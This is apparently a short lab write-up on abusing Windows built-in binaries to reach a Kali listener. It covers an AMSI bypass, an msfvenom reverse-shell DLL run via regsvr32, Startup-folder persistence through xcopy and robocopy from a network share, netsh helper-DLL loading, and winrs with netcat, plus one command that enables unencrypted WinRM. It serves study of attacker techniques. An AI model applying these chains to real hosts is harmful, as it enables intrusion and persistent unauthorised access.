LOLbins



Some instances of LOLbins that i've looked at and found. On a fully patched windows 10 host connecting back to a Kali machine



https://www.contextis.com/en/blog/amsi-bypass

First run this to bypass AMSI. THen work out which AV engine your target uses and bypass it using one of these.



Reverse Shell .dll



Using msfvenom to generate a .dll that calls a tcp reverse shell.





Xcopy



Contents of trix.bat, to run the previously generated .dll via regsvr32.exe .







Xcopy then copies this .bat file into the C:\Users\IEUser\Start Menu\Programs\Startup directory, when files are into this directory, they spawn on startup and execute for a given user





When the user then logs on, this .bat is executed, which then executes a .dll and a reverse shell is executed.





Robocopy




Robocopy then copies from a network share at \\10.0.2.11\ropnop\roprobo , robocopy copies a directory, contained within that directory there is the trix.bat and trix.dll files







As can be seen, this then causes the reverse shell to execute









NetSh






Netsh has a function that is possible to load, that isit can load 'helper' dll's, and it is able to load the previously generated msfvenom dll








Additionally it is possible to gain persistence on a machine, by running netsh.eve, which will then load the helper .dll whenever it is started










Winrs








To allow winrs to be used, it is necessary to enable it, which is possible throug hthe following command - winrm quickconfig -quiet & winrm set winrm/config/Client @{AllowUnencrypted = "true"}








You can then use winrs to run commands via localhos, here I used a netcat executable, nc64.exe to get a reverse shell, however you could use regsvr32.exe or another lolbin to execute a command







References: Azeria's Persistence